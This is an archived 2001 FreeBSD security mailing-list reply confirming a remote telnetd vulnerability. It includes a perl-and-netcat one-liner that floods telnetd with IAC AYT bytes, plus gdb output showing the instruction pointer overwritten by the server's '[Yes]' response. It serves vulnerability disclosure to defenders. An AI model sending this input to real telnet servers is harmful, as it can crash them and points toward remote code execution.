Date: Thu, 19 Jul 2001 11:03:53 +0200 From: "Przemyslaw Frasunek" <venglin@freebsd.lublin.pl> To: "Mike Tancsa" <mike@sentex.net> Cc: <security@freebsd.org> Subject: Re: FreeBSD remote root exploit ? Message-ID: <014d01c11031$bdab5a10$2001a8c0@clitoris> References: <5.1.0.14.0.20010719001357.03e22638@192.168.0.12>
next in thread | previous in thread | raw e-mail | index | archive | help
> Posted to bugtraq is a notice about telnetd being remotely root > exploitable. Does anyone know if it is true ? Yes, telnetd is vulnerable. lagoon:venglin:~> perl -e '$c=sprintf("%c%c", 255, 246); sleep 10; print $c x0 . "\r\n"' | nc localhost 23 (gdb) att 9024 Attaching to process 9024 0x28230f90 in ?? () (gdb) cont Continuing. Program received signal SIGSEGV, Segmentation fault. 0x5d736559 in ?? () (gdb) bt #0 0x5d736559 in ?? () #1 0x804e9d9 in ?? () #2 0x804d1a1 in ?? () #3 0x804d6d1 in ?? () #4 0x804d14d in ?? () #5 0x8049bd3 in ?? () The strange %eip value is: riget:root:/# perl -e 'printf("%c%c%c%c\n", 0x59, 0x65, 0x73, 0x5d)' Yes] "\r\n[Yes]\r\n" is response for IAC AYT command string. -- * Fido: 2:480/124 ** WWW: http://www.frasunek.com/ ** NIC-HDL: PMF9-RIPE * * Inet: przemyslaw@frasunek.com ** PGP: D48684904685DF43EA93AFA13BE170BF * To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?014d01c11031$bdab5a10$2001a8c0>